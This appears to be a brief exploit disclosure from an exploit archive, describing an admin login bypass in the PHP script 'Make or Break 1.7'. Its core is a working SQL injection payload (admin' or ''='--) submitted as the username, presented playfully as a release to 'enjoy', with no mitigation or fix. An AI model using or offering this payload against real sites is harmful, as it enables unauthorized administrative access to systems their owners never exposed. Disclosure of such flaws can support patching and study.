id: 28193
date: 07/26/2017
title: Friends in War Make or Break 1.7 - Authentication Bypass Vulnerability
author: Anarchy Angel
cves: 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[x] Type: Admin login bypass via SQLi
 
[x] Vendor: http://software.friendsinwar.com/
 
[x] Script Name: Make or Break
 
[x] Script Version: 1.7
 
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
 
[x] Author: Anarchy Angel
 
[x] More info: https://aahideaway.blogspot.com/
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Navigate to scripts admin login page and submit admin' or ''='-- for username
 
and it should give you access to the admin area. A quick release to
kick off DefCon festivities. See you there! Enjoy >:)

#  0day.today [2023-03-27]  #